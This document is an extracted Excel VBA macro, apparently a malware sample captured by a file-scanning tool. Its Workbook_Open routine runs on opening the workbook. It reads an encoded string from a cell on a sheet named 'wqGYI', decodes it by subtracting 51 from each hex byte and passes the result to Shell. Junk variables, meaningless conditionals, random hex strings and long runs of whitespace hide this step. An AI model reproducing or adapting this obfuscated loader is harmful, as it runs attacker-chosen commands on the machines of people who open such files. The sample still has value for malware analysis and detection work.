Attribute VB_Name = "Bu|fffd|alismaKitabi"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Sub heraklion(ByVal committed As String)





                                                                            Dim canorousness As Long








                Dim houdini As String








                                                        For canorousness = 2 To Len(committed) Step 2
houdini = houdini & Chr(oolong(chandarnagar(committed, canorousness), 51))
Next canorousness
                    Shell houdini
End Sub
Sub Workbook_Open()





                                                        Dim h27c4d As Integer







             







                                                                        h27c4d = 415






             Dim d286e2411fa85 As Integer
d286e2411fa85 = 415








                                                                Dim f54ca2be As String
f54ca2be = "bbd29db6842e3872b3f6d8beb67da45a5164b95de4bed8566499637ca81cf85e823bbd1b7c13"
Dim ybcba1f56eb4 As String
ybcba1f56eb4 = "pc337187f5e343c7b3cdfd7dbf2e3cd2224e3ee95a1f72f8d8459fdfff1283dc27ab88d6ec3f61f394b5323cee9d77ab6e7"





                







             




                                        If (h27c4d - h27c4d) <> (h27c4d) And (h27c4d) = (h27c4d) Then






                                        f54ca2be = f54ca2be + f54ca2be
h27c4d = h27c4d - h27c4d
ElseIf (h27c4d * h27c4d) = (h27c4d + h27c4d) And (h27c4d) <> (h27c4d) Then
f54ca2be = f54ca2be + f54ca2be
h27c4d = h27c4d - h27c4d
Else






              





                  





                                                            f54ca2be = f54ca2be + f54ca2be
End If
Dim ae9e47166 As Integer
ae9e47166 = 415
Dim z8982e124a As Integer





                                                        






                                                                            z8982e124a = 415
Dim h749a91b2324e As String
h749a91b2324e = "d47a5b7f15ad9e54d57622ff4894edbe4675428823f886acf7f6634cd1f7ccad463c1a9669d9c21886d28e2ac41dcb5e2bdbd75f"
Dim y97f4a6928 As String
y97f4a6928 = "k3eed2a73645d92adf5bb75ef55245d4cff97985686a9e3fca2477db899262d8393843de29edb4eacff3c37ebda79f8e582a65636cc73aad58f1b4"
If (d286e2411fa85 - h27c4d) <> (d286e2411fa85) And (h27c4d) = (d286e2411fa85) Then








              h749a91b2324e = ybcba1f56eb4 + h749a91b2324e
d286e2411fa85 = h27c4d - ae9e47166
ElseIf (ae9e47166 * d286e2411fa85) = (ae9e47166 + d286e2411fa85) And (d286e2411fa85) <> (d286e2411fa85) Then
h749a91b2324e = f54ca2be + f54ca2be
ae9e47166 = d286e2411fa85 - h27c4d







              





                                                            Else
h749a91b2324e = f54ca2be + f54ca2be





                                                        







            End If
Dim tcd7f2febaa3c As Integer






                  tcd7f2febaa3c = 415
Dim de246791 As Integer
de246791 = 415






                Dim qac6cb92cac As String
qac6cb92cac = "n27fb17a7317bf377f753c26c5ddb272a4174d5fcfcc4f562c57d1959bc1c48e597196d3413cafc792597ad35582bed318242d668cc786549e"
Dim l89145d6e85 As String





             






                                                            l89145d6e85 = "lca5b82f559b48f58ad277442178d228d6657b3529589875f38d4c422fd5b3bdda88c57713a8c5544b354deabd"
Dim e88487158 As String
e88487158 = "q355b7ac6f753a9914967692f828ba6a7452893fd8f7f6e759175ccc4cfcfca54678f1b2b329fbb345dc48f423854fab74d48f2d886b4c63b625"
If (d286e2411fa85 - ae9e47166) <> (ae9e47166) And (tcd7f2febaa3c) = (h27c4d) Then
h749a91b2324e = f54ca2be + qac6cb92cac
d286e2411fa85 = d286e2411fa85 - z8982e124a
ElseIf (ae9e47166 * tcd7f2febaa3c) = (tcd7f2febaa3c + tcd7f2febaa3c) And (tcd7f2febaa3c) <> (ae9e47166) Then
h749a91b2324e = h749a91b2324e + f54ca2be
tcd7f2febaa3c = ae9e47166 - h27c4d





           Else
l89145d6e85 = y97f4a6928 + f54ca2be
End If








          Dim xb51d163f853 As Integer






                                                                    xb51d163f853 = 415
Dim k6724d As Integer
k6724d = 415
Dim ee5cd9 As Integer
ee5cd9 = 415
Dim hf488fd933c5 As String







                hf488fd933c5 = "q52aa3ea953be28312cdb9c597ccccee9d1f64c55d74b638f1baa28627bd1b861dcaa376f227b33cde76bee1f57838e3ead742773e"
Dim raa48d89c As String
raa48d89c = "h5c855e58d2d82af6351ac647fea8459cebea8973b5bcdb2432fd5ea92befe6d33b415e738882523"
If (ae9e47166 - z8982e124a) <> (z8982e124a) And (h27c4d) = (z8982e124a) Then








                                                            




                                                            qac6cb92cac = l89145d6e85 + f54ca2be
ae9e47166 = ae9e47166 - h27c4d
ElseIf (z8982e124a * z8982e124a) = (h27c4d + ae9e47166) And (de246791) <> (xb51d163f853) Then
hf488fd933c5 = f54ca2be + ybcba1f56eb4
tcd7f2febaa3c = k6724d - de246791






                                                Else
y97f4a6928 = qac6cb92cac + y97f4a6928








                                                                        End If
: heraklion Sheets("wqGYI").Cells(116, 8).Value
End Sub








                




             Private Function oolong(ByVal animalism As String, ByVal target As Long) As Long





                                                            oolong = CLng(animalism) - target






                                                    End Function






                                        







                                            Private Function chandarnagar(ByVal animalism As String, ByVal target As Long) As String
chandarnagar = "&H" & Right(Left(animalism, target), 2)
End Function
Attribute VB_Name = "Sayfa1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' InQuest injected base64 decoded content
' w;ow
' }sm|
' {w_y

INQUEST-PP=macro
